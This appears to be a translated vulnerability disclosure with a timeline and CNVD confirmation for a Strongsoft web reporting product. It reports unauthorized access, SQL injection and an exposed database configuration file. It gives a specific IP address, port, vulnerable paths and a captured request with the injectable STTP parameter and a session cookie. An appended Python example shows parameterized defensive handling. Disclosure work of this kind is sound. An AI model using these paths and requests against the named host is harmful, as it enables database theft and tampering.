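2015-02-24: Details reported to the vendor; awaiting vendor handling
2015-03-02: Vendor has confirmed; details disclosed to the vendor only
2015-03-05: Details opened to third-party security partners
2015-04-26: Details disclosed to core white hats and experts in related fields
2015-05-06: Details disclosed to regular white hats
2015-05-16: Details disclosed to intern white hats
2015-05-31: Details disclosed to the public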
As the title says: unauthorized access + SQL injection + sensitive information disclosure
Official site:
http://www.strongsoft.net/DMenu.aspx
Cases:
#SQL injection
Vulnerable file:
/report/ReportMain.aspx
This page can be accessed without authorization, and it is also vulnerable to SQL injection.
Captured request:
GET http://222.83.214.58:8088/report/AjaxHandle/StationChoose/StationTree.ashx?STTP=%27KKK%27,%27DD%27,%27DD_R%27,%27PP%27,%27RR%27,%27MM%27,%27ZQ%27,%27ZQ_R%27,%27RR_R%27,%27TT_R%27,%27TT%27&ADCD=&search=1&RadioType=Radio_QY&ReportID=Report11&_=1423816421920 HTTP/1.1
Host: 222.83.214.58:8088
Proxy-Connection: keep-alive
Accept: application/json, text/javascript, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://222.83.214.58:8088/report/ReportMain.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=lgucng45mk2mwf45oc1zdiuz; CheckCode=PR46
The database can be dumped.
#Unauthorized access
Vulnerable file:
/MenuManagement/MenuMain.aspx
Arbitrary add and delete operations are possible.
Examples:
#Database configuration file disclosure
Vulnerable file:
/Config/DataSetConfig%23.xml
Examples:
Programmers will understand.
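For the SQL injection section above, the following added example (not code from the original report or from the vendor) shows how a handler can accept the quoted STTP list seen in the captured request without ever placing client text into SQL. It assumes the STTP list feeds an IN (...) clause; the code pattern, the station table and its columns are hypothetical, and Python with sqlite3 stands in for the product's ASP.NET stack so the example runs offline.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumption: station-type codes look like the ones in the captured request
# (KKK, DD, DD_R, ...): 2-3 capital letters with an optional _R suffix.
CODE_RE = re.compile(r"[A-Z]{2,3}(?:_R)?")

# Query string from the captured request (cache-buster parameter omitted).
CAPTURED_QS = ("STTP=%27KKK%27,%27DD%27,%27DD_R%27,%27PP%27,%27RR%27,%27MM%27,"
               "%27ZQ%27,%27ZQ_R%27,%27RR_R%27,%27TT_R%27,%27TT%27"
               "&ADCD=&search=1&RadioType=Radio_QY&ReportID=Report11")


def parse_sttp(raw):
    """Return the bare codes in an STTP list; raise ValueError on anything else."""
    codes = []
    for item in raw.split(","):
        item = item.strip()
        # The client wraps each code in single quotes; strip exactly one pair.
        if len(item) >= 2 and item[0] == item[-1] == "'":
            item = item[1:-1]
        if not CODE_RE.fullmatch(item):
            raise ValueError(f"rejected STTP item: {item!r}")
        codes.append(item)
    return codes


def stations_for(conn, query_string):
    """Look up stations for the STTP list, passing codes only as bound parameters."""
    raw = parse_qs(query_string, keep_blank_values=True).get("STTP", [""])[0]
    codes = parse_sttp(raw)
    placeholders = ",".join("?" * len(codes))
    sql = f"SELECT name FROM station WHERE sttp IN ({placeholders}) ORDER BY name"
    return [row[0] for row in conn.execute(sql, codes)]


def demo_db():
    """Constructed sample data; the table and column names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE station (name TEXT, sttp TEXT)")
    conn.executemany("INSERT INTO station VALUES (?, ?)",
                     [("A", "PP"), ("B", "RR"), ("C", "ZQ_R"), ("D", "XX")])
    return conn


if __name__ == "__main__":
    print(stations_for(demo_db(), CAPTURED_QS))
```

Only the number of placeholders depends on the request; an empty or malformed STTP value is rejected before any query is built.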
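Severity: High
Vulnerability Rank: 11
Confirmed: 2015-03-02 16:01
CNVD has confirmed the situation described and has passed it through CNCERT to the Fujian branch center, which will coordinate follow-up handling with the organizations that operate the websites.
None yet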